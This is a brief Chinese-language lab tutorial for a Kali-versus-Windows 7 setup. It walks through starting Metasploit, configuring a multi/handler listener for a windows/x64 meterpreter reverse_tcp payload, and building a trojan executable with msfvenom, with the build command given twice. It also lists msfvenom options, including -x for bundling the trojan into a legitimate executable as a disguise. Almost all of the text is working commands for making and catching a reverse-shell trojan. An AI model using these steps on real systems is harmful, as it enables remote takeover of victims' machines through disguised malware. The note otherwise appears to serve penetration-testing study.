实验环境
KaLi 与win7 ‘
kali ip =192.168.0.109
win7 ip =192.168.85.130
漏洞利用
1.启动Metasploit
msfconsole
2.漏洞
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
Show options
将目标IP填进去
set LHOST ip
set LPORT 端口(有默认可改)
生成木马
payload
msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
木马制造:msfpayload kali 于2015年合并于msfvenom
工具:msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ip(攻击者) LPORT=端 -f exe >text.exe
msfvenom参数:
-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助